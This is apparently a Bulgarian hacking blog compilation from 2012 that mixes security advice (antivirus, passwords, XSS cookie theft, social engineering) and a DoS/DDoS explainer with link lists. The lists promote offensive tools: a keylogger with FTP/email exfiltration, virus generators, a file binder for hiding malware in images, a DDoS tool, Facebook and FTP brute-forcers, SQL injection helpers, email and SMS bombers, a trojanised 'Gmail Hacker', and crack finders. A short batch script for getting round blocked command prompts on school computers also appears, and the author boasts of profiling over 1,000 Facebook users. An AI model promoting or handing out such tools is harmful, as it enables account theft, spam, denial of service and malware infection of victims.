Как да се предпазим от тези гадини - задължително трябва да имате антивирусен софтуер. Сканирайте редовно, проверявайте за грешки в регистрите ( например с RegDoctor ). Не приемайте файлове с разширение .exe / .jpeg.exe и т.н. След като свалите / приемете даден файл, първо сканирайте с антивирусният си софтуер.
Все пак има FUD криптери, които правят вирусите неловими от антивирусите. За щастие, тези криптери струват пари, а малко са хората които биха дали над 20 евро ( последният FUD криптер, който се продаваше в alboraaq беше толкова ), за да се здобие с паролата ви на фейсбук акаунта ви.

Защо Linux няма вируси ? - отговора на този въпрос е доста прост. Линукс базираните дистибуции не работят като windows. В смисъл, не работят с администраторски акаунт. Например, преди време firefox имаше уязвимост, чрез която злонамереният човек ( кракера ) можеше само като ви накара да влезнете в една страница, да запише даден файл на вашият компютър и да го стартира. Защо тогава линукс потребителите не пропищяха ? Понеже линукс работи с потребителски акаунт, а той няма права да маже по самата система ( освен по собствената папка ), вируса не може да функционира правилно.
В момента за Internet Explorer 6, 7 и 8 има същият exploit. Сигурен съм, че скоро и за деветката ще излезне. Защо ли ? 3 месеца след като излезна IE6 вече в microsoft знаеха, че има уязвимост. И както виждаме, в версия 7 и 8 тази уязвимост не е фиксната. Защо пък точно в 9тата да го оправят ?!

Ъпдейти ( Updates ) - безспроно ъпдейтите вършат доста голяма работа. Не знам защо доста windows потребители ги изключват. Може би защото са с пиратски копия ? Това си е техен проблем. Моето лично мнение е, че когато дадена система / програма не е ъпдейтната до последната версия, тя не функционира на 100% правилно.
Логиката е много проста - щом е излязла нова версия / ъпдейт на даден софтуер ( например ), то значи в предишната има някаква грешка, която в новата версия е фиската и самият софтуер е подобрен. Едва ли има човек, който да не иска по-доброто.
Много важно е да ъпдейтвате вашият антивирусен софтуер. Повечето антивируси работят със сигнатури, които трябва винаги да бъдат обновени. Иначе излиза нов вирус, базата ви данни със сигнатури не е обновена - нищо не пречи на вируса да заобиколи антивируса и да си свърши своята работа.

Какво да правим, когато видим че някой се опитва да ни атакува ? - някой се опитва да атакува вашият сайт или компютър ? Не си губете времето да пускате репорти по cybercrime, например. Те не се занимават с такива дребни атаки, целящи да вземат нечия парола и да я сменят. Те се борят с пиратското съдържание и т.н. Това което трябва да направите е да защитите вашият сайт / компютър до максимум. Проверете къде могат да са грешките ( уязвимостите ) и ги поправете. Повечето кракери не са особено умни и не са на повече от 15-16 години ( хах ). Ще опитат няколко начина и като видят, че не става - се отказват.
Всички знаем колко е готино да си кракер, който е пробил една голяма компания, например. Да бъдеш обсъждан по форуми, че може и да те дадат по телевизията. Доста хлапета се опитват да направят това, но понеже не им достига акъл, няколко часа след първият опит за пробив се отказват.
Не се плашете от заплахи - истинските ( умните ) кракери никога не заплашват жертвите си. Първо действат, след като намерят уязвимост в система докладват за нея - ако не се вземат мерки, тогава атакуват.

Как да се предпазим от крадене на лични данни ? - начините да се съберат лични данни са стотици. Най-лесно е да се напише името / никнейма ви в google, от където ще се индексират една голяма част от профилите ви по разни сайтове. Ако сте въвели важна информация там - представете си колко „трудно” ще е на човека отсреща да разгледа и събере информация за вас.
Фейсбук - може би най-голямата база с лични данни. Аз лично съм събирал доста голяма информация за над 1 000 души от тази социална мрежа. Като се започне от любимият стил музика, продължи се с настояща работа и се завърши с интереси - всичко това може да бъде намерено от всеки който пожелае. Най-лошото е, че точно тези данни могат да се използват за социална инжинерия - това с което ще продължа.

Социална инжинерия - що е то ? - една голяма част от хората избират лесни пароли, които няма да забравят. Имена на родителите си, рожденни дати, номер на лична карта и т.н. Обективно погледнато това е доста тъпо. Най-просто казано, социалната инжинерия е метод за взимане на данни, крадене на пароли и т.н. Преди време четох едно доста интересно текстче, в което се описваше как с социална инжинерия можете да се доберете до компютрите на дадена компания, и то само чрез добър външен вид, добро държание и главно лъжа. В общи линии, социалната инжинерия е точно това - лъжа. Лъжа, с която да заблудиш хората и те сами да ти кажат това което искаш да разбереш, без те са се усетят.

Поздрави, Necrosis !

Няколко съвета, които могат да ви спестят неприятности. #1

Няколко съвета, които могат да ви спестят неприятности. #1
Темата не е моя , но е тук с разрешението на автора "Necrosis"  (cwi-group.org/) !



Никога не приемайте файлове от непознати. Особено с разширение .exe, .bat и т.н.
Както сигурно знаете, гадините от тип rat, keylogger и т.н. обикновенноз се разпротстраняват под такива разширения.
Но, не е задължително. Има стотици tool editor-и, които могат да направят вируса в jpeg формат, например. Дори в .src.
Моето лично мнение е, че на всеки компютър трябва да има антивирусна. И при получаване/изтегляне на файл, просто цъквате с десен бутон върху него - сканиране (почти всички антивирусни имат такава функция).

Ако не желаете да си качвате софтуер, който да се бори с гадините - можете да използвате он-лайн сканерите - например scanner2.novirusthanks.com. Просто избирате файла, който желаете да сканирате и след няколко секунди виждате резултатите.
Е, ако вируса е FUD, може да не се засече от антивируса, но повечето FUD криптери (даже май всички) са pri8, а едва ли някой който има такъв ще си прави труда за да се добере до вашите пароли, освен ако не сте някоя наистина важна личност и имате достъп до наистина голями сайтове/директории/системи, или на компютъра си имате много важна информация.

Ако ваш приятел желае да ви изпрати файл по скайп например, също проверете дали файла не е заразен. Защо ? Защото не знаете кой със сигурност седи от другата страна. Ако кракера е заразил вашият приятел, взел му е паролата и се е логнал в акаунта му - то може би иска да зарази и вас. В такива случаи (както спомена Иван Ванков в едно от видеата си) просто попитайте „приятеля си” (в кавички, защото не е сигурно, че е той) някакъв въпрос, на който само той може да даде отговор. Кога е била последната ви среща и т.н. - просто трябва да се убедите, че вие реално си пишете с вашият приятел.
Не отваряйте и съмнителни ликнове. Има доста начини кракера да вземе исканата от него информация, като само ви накара да влезнете в някой сайт. JavaDriveBy и .т.н.

Ако сте уебмастър, то сайта ви естествено ще бъде подложен на XSS атаки. Тези атаки целят крадене на бисквитките (cookies). Например, ако вашият сайт е уязвим към XSS атаки, кракера ще се опита да ви подмами да влезнете в линк към собственият ви сайт, където е „ръгнат” javascript код, който ще вземе вашите бисквитки и ще ги изпрати на кракера.

Е, това не е единствен начин да ви се вземат бисквитките. Доста кибер престъпници (хах) просто си създават акаунт в някой безплатен хостинг, качват си javascript-а, дават ви линк и когато вие кликнете на него - вече знаете какво става. Просто начина със собственият сайт на уебмастъра е по-удачен за кракера.
Какво може да стане, когато ви откраднат бисквитките - не, няма да умрете от глад. Те взимат сесиите и ги запаметяват. Тоест, когато например се логнете в този форум и кликнете на бутончето „запомни ме”, бисквитките запомнят, че точно вас трябва да ви логва автоматично когато влезнете в форума.
Когато някой ви открадне бисквитките (за кой ли път го казах), той просто ги слага върху своят браузър (не буквално), рефрешва си страницата и самият той вече е логнат с вашият акаунт. От там той може да ви създаде доста проблеми и т.н.
Точно за това, доста уебмастъри използват SSL сертификат, който е доста добра защита срещу такива опити за крадене на данни.

Също така, използвайте дълги и сложни пароли - от типа на „23j2j2^!$skdh1823”. Не е нужно да е точно такава, но да е от такъв тип. Изберете си парола, нещо което да не може да бъде отгатнато от който и да е, добавете му няколко знака „!@№$%€§*()–+" например.
Не слагайте за пароли ЕГН-та, телефони, рожденни дати и т.н. - има стотици речници както с български, така и с чуждестранни комбинации от числа, които могат да се използват при bruteforce.
В никакъв случай не давайте паролите си на когото и да било (това може би го знаете).

Един съвет - не използвайте поща в mail.bg - има bruteforce скрипт за нея. Вярно, че отнема около 30 минути за да разпознае парола „123456”, но по-добре ползвайте hotmail.com / gmail.com/ mail.ru / abv.bg.

Все пак, винаги има начин да се открадне паролата ви. Ако някой успее да добие достъп до даден сайт в който имате регистрация и дъмп-не DB-то, когато го отвори ще види списък с всички потребители, техните пароли, мейл и т.н.
Доста от CMS системите използват md5/sha1 кодировка за паролите, които евентуално кракера ще види в .sql файла. Това също ще го затрудни, затова ако сте уебмастър и използвате собствена (авторска) система, използвайте различните видове кодировки за пароли. И не забравяйте - използвайте ги за информация, която няма да бъде видима за потребителите.

Не ползвайте едни и същи пароли навсякъде - горе съм споменал причината. Просто ако се извлече паролата ви от даден сайт, и тя съвпада с тази на акаунтите ви във всички сайтове в които имате регистрация - белята става голяма.

Също така, не пазете паролите си и важни данни в някакъв файл, който се поддържа на компютъра ви. Доста типове вируси, като rat например (главно cybergate), има функция за разглеждане на файлове, които са на машината на потенциалната жертва.

Не ги записвайте и на лист - все ще се намери някой, който ако намери листа с паролите ви, ще реши да се базика с вас.
Не е толкова трудно да запомните няколко пароли, при положение че всеки ден ще ги използвате и съответно ръцете ви ще придобият навик да ги пишат.

Доста се отклоних от дадената тема, но реших да напиша малко повече за това как изцяло да се предпазим от злонамерени атаки и т.н.

Как да получим безплатен трафик към сайт и същевременно да правим пари от това

Как да получим безплатен трафик към сайт и същевременно да правим пари от това
Проекта е от Китай.Става въпрос за програма в която въвеждате ваши линкове и така разменяте трафик с други хора абсолютно ЛЕГАЛНО , а също така аз лично я използвам и за допълнителен доход както сами ще видите на снимката.Много добра програма с единствен недостатък езика
Линк за програмата можете да намерите : ТУК 

Безплатни СМС до цял свят , СМС bomber , Kогато сайта изисква код получен от смс

Безплатни СМС - ТУК

СМС Бомбер
 Същото място само ,че не натискате един път бутона а спамите с мишката.Само ще ви помоля не преигравайте за да не ни клъцнат достъпа за МТЕЛ гарантирам че работи , за вивател го пробвайте и споделете отзив.

Когато сайта изисква код получен от смс:
Доста често срещан проблем неискаме да си даден номера във всеки сайт , но пък те искат да проверяват колко сме истински   С сайта се работи много лесно виждате няколко GSM номера от Норвегия избирате си единия въвеждате номера му където ви е нужен след 1 мин ( рефреш ) и получавате текста. От сайта призовават да се използват телефоните с най-малко трафик.А ето го и сайта ТУК

1 Част DOS атака – Oтказ на услугите

В 2 част очаквайте няколко съвременни такива програми

Името означава Denial of Service и означава отказ на услугите и има за цел да спре достъпа до определена част от сайт или самия сайт ,а също така и големи компютърни мрежи посредством Flood . Често такъв вид атаки се организират групово и мотивите за това са доста в повечето случаи това са протести на големи групи като Anonymous , да покажат на света ,че не са съгласни с дадено нещо.Най-често се използва атака при която даден сайт получава милиони заявки за външна комуникация и така се насища на 100% и сайта остава неработещ за други потребители.Атаките се считат за престъпление.Когато компютър от вашата мрежа пусне такъв вид атака срещу даден сървър това се отразява на цялата мрежа той заема целия трафик.Затова когато във вашата мрежа има заразени с вируси компютри които биват използвани за атаки върху сайтове това се отразява на цялата мрежа.

Симптоми за DOS – атака

Те включват

Нестабилна и слаба мрежа

Невъзможност да посетите даден сайт

Невъзможност да посетите всеки един сайт

Могат да бъдат също така и милиони писма които също блокират и препълват пощата за период от време

Могат да изменят мрежовата честота на Wireless Рутерите

Да спрат целия интернет да определен регион ( Представете си как 2000 заразени компютъра в даден град са заразени и консумират целия трафик на мрежата )



Видове DOS атаки – Най-често се разделят на два вида crash и flood услуги.Разделят се на пет основни вида.

Потребление на изчислителните ресурси , трафик ,препълване на дисковото пространство , времето на процесора

Прекъсване на TCP мрежовите услуги

Прекъсване на конфигурацията за маршрутите оказващи заявките

Прекъсване на физическите компоненти на мрежата

Възпрепятстване на медии за комуникация между потребителите и жертвата, така че те вече не могат да общуват адекватно.

DOS атака могат да включват изпълнение на зловреден софтуер, предназначен за:Използване максимално на CPU за да предотврати атаката.Software който може да направи по-нестабилен и да се изключи в даден момент машината.Търсещ грешки в операционната система и използващ тях за „ бой за системни ресурси „


Distributed attack  (DDOS ) – Това е разделена атака когато дадена система или сайт е наводнена отмножество потребители  използващиразлични методи .Атаката е тясно целенасочена.Има доста различни програми коитоизпълняват тази функция като един от най-известните е MyDoom механизамът напрограмата се задейства определен ден и час . Система може да бъдекомпрометирана с троянски кон, което позволява на атакуващия да изтеглите зомбиагент на определени компютри които после участват в атаката . Stacheldrahtе класически пример за DDoS инструмент. Тя използва слоеста структура, вкоято атакуващият използва клиентска програма, за да се свържете с „малкатаси армия компютри работещи за него „.Сега си представете човек ,който има наразположение 100 , 1000 или 10000 компютъра работещи за него готови да правятвсичко какво им бива зададено .Тези системи са известни като ботнет .Акоатакуваме даден сайт/сървър от един компютър то атаката е DOS , но ако гонаправим от много хостове ( потребителски компютри или сървъри ) то тази атакае DDOS . Основната причина за DDOS както сигурно се сещате е ,че много компютригенерират повече трафик от един и е доста по добре (или зле въпрос на гледнаточка ) . Именно с тази цел  след като „хакера „ има достъп до даден сайт като администратор той качва зловреден код „ shell“  ,който му позволява да има пълендостъп до машината или троянски кон за потребителски компютър. Има случаикогато хората доброволно предоставят компютрите си за извършване на DDOS атакипример за това е  2010г. атака срещуголеми американски компании за кредитни карти . В този случай привърженици наДжулиан Асанж доброволно са свалили такъв software.



ICMP Flood - Тя разчита на неправилно конфигурирани мрежови устройства, които позволяват да бъдат изпратени пакети за всички компютърни хостове в даденамрежа, чрез излъчване адреса на мрежата, а не конкретна машина. Мрежата служикато усилвател . Тази атака изпраща голям брой пакети с дрес на източника , които фалшифицирано се появяват на адреса на жертвата.Мрежовата честота доста бързо ще се запълни и истинските пакети няма да достигат.P

Ping Flood – Това е атака при която атакуващия изпраща голям брой такива пакети към жертвата с цел да забави нета .За да е успешна такава атака трябва да имате интернет по-добър от на атакувания.

Ping of Death – Изпраща деформиран пинг пакет ,който има за цел да срине системата

SYN flood – Към атакувания се изпращат заявки от фалшив подател което пренасища броя връзки на сървъра

Teardrop attacks – Атака при която се изпращат файлове разкъсани на фрагменти които немогат да се покрият от атакувания.Най-често ползвана е при Windows 95 , 98 , NT , Vista при Vista атаката е към по-горен мрежов слой SMB2

Peer-to-peer атаки – Използва exploit-и в peer-to-peer сървъри за да започне DDoS атака.Най-често се използва DC++ за връзка . Те са различни от botnet базирани атаки.При този вид атаки хакера няма нужда да комуникира с клиента .Той само дава напътствия , инструктира клиентите да споделят голямо количество peer-to-peer файлове , хъба дисконектва и в резултат се вързват към жертвата.В резултат няколко хиляди компютъра могат агресивно да се опитват да се свържат към атакувания компютър.Когато нормален сървър обикновено може да подържа няколко стотин в секунда.Преди да започне да започне да дава грешки.С по модерни и големи peer-to-peer атаките стигат до 700 000 . Това са 700 000 IP адреса които устроиството трябва да блокира.Атаката е към порт 80 и ако не ви е нужен.Не е нужно да стой отворен на вашия личен компютър.

Nuke – е стар метод , който изпраща невалидни пакети до жертвата подобно на ICMP модифициран пинг , количеството е голямо и забавя компютъра докато недоведе до пълното му спиране.Конкретен пример за такъв вид атака е WinNuke използва уязвимост в NetBios изпраща данни до порт 139 TCP и на екрана виждате недотолкова любимия ни СИН екран

сряда, 15 февруари 2012 г.

Joomscan - Програма създадена за проверка на Joomla сайтове

Програмата можете да свалите от : Тук
Това е една от най-добрите програми правени за проверка на сайтове направени с платформа Joomla проверява над 850 еклсплойта и изписва подробен резултат каде са грешките.За използването и е нужно да имате инсталиран Perl
Ето и Screenshot от програмата:

Антивирусни и Архиватори

В тази статия ще ви представим най-популярните антивирусни програми и архиватори събрани на едно място за да прецените какво да изберете.

Антивирусни програми
Kaspersky Anti-Virus 11.0.2.556
Avast! Free Antivirus 5.1.889
Malwarebytes Anti-Malware 1.50.1
AVG Free Edition 10.0.1191 (32-bit)
AVG Free Edition 10.0.1191 (64-bit)
AVG Anti-Spyware 7.5.1.43
NOD32 AntiVirus 4.2.67 - ESET
Ad-Aware 2009 9.0.0.0
Windows Defender 1.1.1593
A-squared Free 4.5.0.27
AntiVir Personal 10.0.0.609
BitDefender 10 Free Edition
McAfee VirusScan 10 - Proven security
VirtualBox 3.0.6.52128

Архиватори
7z
WinZip 15.0.9334
Power archiver 11.71
WinRAR 4.00 Beta 4 (64-bit)
IZArc 4.0.1760 Beta
O&O DiskImage Express 4.1.34
WinAce 2.69

Част 2 Списък с едни от най-добрите програми в интернет и описание за тях

В предишната статия видяхте доста добри програми ,но те не са всичките има още много и тук ще намерите продължение на големия списък с програми.

Resource Hack - С тази програма можете да променяте всякакви детайли по програмите които използвате.Можете да смените дори името на производителя на програмата.Тази програма е добре да се комбинира със следващата.
http://adf.ly/5VsZl

PSP editor - С тази програма можете да видите Сорс кода на дадена програма и да го модифицирате по ваш тип.Предлага много възможности.
http://adf.ly/5VsZm

Mess Bomber - Програма за спам на даден Емайл ( ползването на такъв тип Software е забранена използвайте го само за учебна цел )
http://adf.ly/5VsZn

Fill-er-up collection - 3 Програми които са за спам също като предишната , но доста по добри.
http://adf.ly/5VsZo


Shock Labs File Binder v1.0 - Много добра програма с която можете да смесите два файла например програма със снимка.В повечето случаи тези програми се използват за да скрият даден вирус в снимка.
http://adf.ly/5VsZp

Portable.Wireless WEP Key Password Spy v1  -  Много добра програма за разбиване на WEP Wireless парола през Windows.Има доста уроци в интернет как се прави ,но те са доста по-сложни и са под Linux .
http://adf.ly/5VsZq

Ardamax Keylogger 3.1 - Един от най-добрите Keylogger-и правени някога има редовна подръжка.Опция за FTP/Email където да праща събраните данни.
http://adf.ly/5VsZr

Server Attack  - Програма за DDoS атака към даден сайт праща голямо количество информация към сайта и при наличие на добра интернет връзка и повече хора които го използват срещу сайт има доста добри резултати.Моля използвайте само за Учебна цел.
http://adf.ly/5VsZs

Tartou2 File Pumper 1.0 - С тази програма можете да променяте големината на файловете ,но само към по-високи стойности.
http://adf.ly/5VsZt

Facebooz - Много хора се чудят как се хакват фейсбуук профили ето един от вариантите с ,който се прави това.Работата с програмата се много проста въвеждате списък с usernames и списък с пароли и я пускате да работи сканира бавно , защото фейсбуук има защита ако се въвеждат прекалено бързо паролите.Много хора мислят че програмата не работи ,но те искат да хакнат даден профил с магическа пръчица.
http://adf.ly/5Vw04

Brutus - Разбива пароли на FTP / Рутери / страници и други.Има доста методи за разбиване на паролите една от най-добрите програми от вида си.
http://adf.ly/5Vw08

PassList Generator - Името на програмата говори доста.Можете да направите собствен списък с пароли което е по-добрия варянт от дърпането на 50GB ,който в повечето случей има доста излишни неща.
http://adf.ly/5Vw0E


In Shadow Batch Virus Gen - 4.1.2 - Програмата прави вируси от типа Batch можете да правите доста професионални такива.Използвайте го изцяло за учебна цел и тествайте само на резервен компютър.Паролата е  без кавичките "In shadow"
http://adf.ly/5Vw0J

Atomics Virus Creator V.65 - Прави доста професионални вируси също както предишната програма.Една от най-използваните хакерски програми.
http://adf.ly/5Vw0N

Следващите 3 програми е добре да работят заедно и да използвате и трите за максимални резултати.
Exploitscanner - Сканира сайтове за грешки.Въвеждате Dork ( споменахме какво е в предишна статия ) .
http://adf.ly/5Vw0Q


SQL I Helper V.2.7 - Има опция да изпълни цялата трудна работа по SQL инжекцията  просто я настройвате какво да прави.
http://adf.ly/5Vw0U


Admin finder -  След като вече сте намерили паролата на администратора ,но незнаете каде да намерите админ панела или страницата това е перфектната програма за вас.
http://adf.ly/5Vw0Y

cain and abel  - Това е една от най-мултифункционалните програми в интернет можете да правите sniffing на мрежата , да хакнете паролата на windows , разбива hash и доста други работи.Скоро ще има статия специално за тази програма.
http://adf.ly/5Vw0a

Gmail Hacker - Работи се с нея много просто пращате я на хора които искат да хакнат даден Gmail акаунт ,но хакнатите в случая са те.Звучи доста добре.
http://adf.ly/5Vw0b


Chat Spammer - Името говори само по себе си най-вероятно няма нужда от обяснение за тази програма.
http://adf.ly/5Vw0f


1st Mass Mailer 4.2 - Много добра програма за изпращане на масови емайли от даден списък.
Сериал: "18935379480889"
http://adf.ly/5Vw0m


My lock box
Можете да криете файлове или директории доста добра.
http://adf.ly/5Vw0n


Icon Changer v3.8 - С тази програма можете да сменяте иконите на дадени програми.
http://adf.ly/5Vw0o

Част 1 Списък с едни от най-добрите програми в интернет и описание за тях

Списък с едни от най-добрите програми в интернет и описание за тях.Не са подредени по групи , но като ги разгледате съм убеден ,че ще си харесата доста от тях.

PenProtect - позволява ви да сложите парола на вашите USB устройства.
http://adf.ly/5VoyG

Craagle v3.0 - намира кракове за всички ваши програми които са триал версии
http://adf.ly/5VpAV

VBScript Скрипт с който можете да направите така че компютъра ви да говори доста добър много хора се оплакват от неработещи версии , но тези са проверени
http://adf.ly/5Vpjh
или
http://adf.ly/5Vpji

Advanced zip Password Recovery v4.00 - Намира забравените пароли на .zip файлове.
http://adf.ly/5VpvE

Advanced Archive Password Recovery pro v4.5 - Същото като предишното но работи с .rar файлове.
http://adf.ly/5VpvG

Process_Hacker - Следи всички връзки от вашия компютър към интернет много добра програма за хващане на троянски коне и зловредни програми.
http://adf.ly/5VpvI

Brutus quick buttons - Много добра програма за мързеливи хора които искат всичко да става лесно с един бутон.
http://adf.ly/5Vq4j

Typing Master Pro - Без повече мъки когато пишем програмата се настроива доста лесно и ще ви е доста от ползва особено за хора които пишат статии.
http://adf.ly/5Vq4k

Html lock - Можете да защитите вашите HTML кодове като им сложите парола.Те са криптирани и е невъзможно да бъдат откраднати.
http://adf.ly/5Vq4l

7z - Най-добрия архиватор правен някога слага в малкия си джоб WinRar и WinZIP до 80% по добър от тях.За тази програма няма две мнения.
http://adf.ly/5Vq4m

Delayed Shutdown - Можете да нагласяте кога компютъра ви да се изключва Windows има такава опция ,но е доста по сложно за настройка.
http://adf.ly/5Vq4n

Ares - Бързо намиране на всичко което ви е нужно в интернет и сваляне. Няма нужда да чакате в сайтове които изискват да имате платен акаунт за да свалите даден файл.Много добра програма
http://adf.ly/5Vqyt

Redtube downloader - Не много нужна програма , но най-вероятно повечето от вас гледат порно в сайтове като редтуб дот ком . С тази програма можете да сваляте любимите си клипове без да сте купили акаунт.От сайта се опитват отчаяно да спрат такъв вид програми , но засега безуспешно.
http://adf.ly/5Vqyv


Trojan remover - Намира и трие всички троянски коне които имате по компютъра ви.Доста по-добра от стандартните антивирусни програми.
http://adf.ly/5Vqyw

Sand boxie - С тази програма можете изолирано от цялата система да ползвате програми в които се съмнявате ,че може би имат вируси включени в кода.Вирусите са абсолютно безвредни когато ползвате програмите през тази програма.
http://adf.ly/5Vqyx


CCleaner 2.20.920 - Доста добра програма за почистване на Windows можете да върнете цялата система да работи почти като след формат.
http://adf.ly/5Vqyy


Spyware Terminator 2.5.7.126 Beta - Безплатна програма която сканира целия компютър за грешки и ги поправя и е абсолютно безплатна.Също добра програма.
http://adf.ly/5Vqyz

SmartyUninstaller - Сигорно сте срещали програми които неискат да се Uninstall-нат.В повечето случаи това са вируси.Тази програма може да помогне доста.
http://adf.ly/5Vqz0

Как да сме анонимни в интернет TOR , Real Hide IP

Здравейте днес ще ви представя две програми които могат да ни направят частично анонимни в интернет . Едната е TOR която е доста добра програма и популярна ,а другата Real Hide IP

TOR можете да свалите от този линк : Тук
 http://uploading.com/files/c7425434/tor-browser-2.2.35-3_en-US.exe/

Real Hide IP от  : Тук

Няма да се впускам в дълги и подробни обяснения как да ги използвате или закакво.Причините за използване на чужди IP-та са много и различни сами можете да прецените къде искате да не виждат вашето IP.
Ето два Screenshot-а от програмите:


вторник, 14 февруари 2012 г.

Трикове с Firefox

1.Повече пространство - Направете иконите по-малки отидете на View > Toolbars > Изберете опцията "Use Small Icons"
2.Как да ускорим работата си с Mozilla Firefox много просто като боравим повече с клавиатурата
Ето някой полезни копчета които можем да използваме
Spacebar - Мести страницата надолу
Shift-Spacebar - Мести страница нагоре
Ctrl+F - Търсачка
Alt-N - Намери следващо
Ctrl+D - Bookmark текущата страница
Ctrl+T - Нова страница
Ctrl+K - Полето Търсачка
Ctrl+L -  Адрес Бар
Ctrl+= - Увеличи размера на текста
Ctrl+- - Намали размера на текста
F5 - Презареди
Alt-Home - Отиди на Home Page


3.Tab навигация:
Доста по бързи ще сте ако използвате клавиатурата за смяна на текущата страница ето няколко комбинации които можете да използвате
Ctrl+Tab - Пусни следваща страница от списака
Ctrl+Shft+Tab - Пусни предишна страница от списака
Ctrl+1-9 - Изберете страница на която искате да отидете


4.Комбинации с мишката
Също доста можете да подобрите работата си като използвате това:
Клик със средното копче на мишката - Отваря в нов прозорец
Shift-Scroll Down - Предишна страница
Shift-Scroll Up - Следваща страница
Ctrl-Scroll Up - Намаля размера на текста
Ctrl-Scroll Down - Увеличава размера на текста
Средно копче върху страницата - Затваря текущата страница

5.Изтриване на сайтовете от Адрес бара "История":
Firefox има опция да показва предишни страници които сте посетили  като започнете да ги пишете в адрес бара това е доста добре , но понякога неискате това да се случва.Отидете на адрес бар (CTRL-L) , започнете да пишете адрес и ще се появи менюто със страниците които сте посетили намерете това което искате да изтриете и натистенете клавиша Delete .

6.Ограничаване на използвания рам- Ако Firefox използва голямо количество памет от компютъра можете да го ограничите. Отидете на about:config , филтър "browser.cache" и изберете  “browser.cache.disk.capacity” Нагласено е на 50 000 , но можете да го намалите в зависимост от количеството рам което имате ако е между 512 и 1 GB го оставете на 15 000.

7.Ограничете използването на RAM когато Firefox e минизиран.
Тази опция ще направи така ,че Firefox да използва доста по малко количество рам когато е минизиран вашия браузер.Отидете на about:config , Десен бутон някаде и изберете New -> Boolean . Кръстете го "config.trim_on_minimize" и 
го сложете TRUE . Трябва да рестартирате Firefox  за да сработи.



Как да отворим файл когато C: е заключено

Здравейте.Повечето компютри във интернет залите в училищата и университетите са блокирали достъпа до C:/ за да се защитят от набези по компютрите.Има много начини да проникнете в хард диска които са CMD Command Prompt , Firefox/Google Chrome и други.
Използвайте материала само за учебна цел.

Firefox/Google Chrome метод

Отворете браузара и въведете следния адрес:
C:\
Това няма да ви позволи да отворите файловете , но ще можете да ги свалите.С други думи ви трябва цялата папка за да сработи дадено .exe освен ако не е самостоятелен файл.

Този метод е добър когато търсите даден файл защото можете да го отворите с CMD

Command Prompt
@echo off
title CMD
:1
set /p a=%cd%^>
%a%
goto :1

За да отворите C:/ напишете следното:
C:
Ако искате да отворите файл:

start C:\Windows\cmd.exe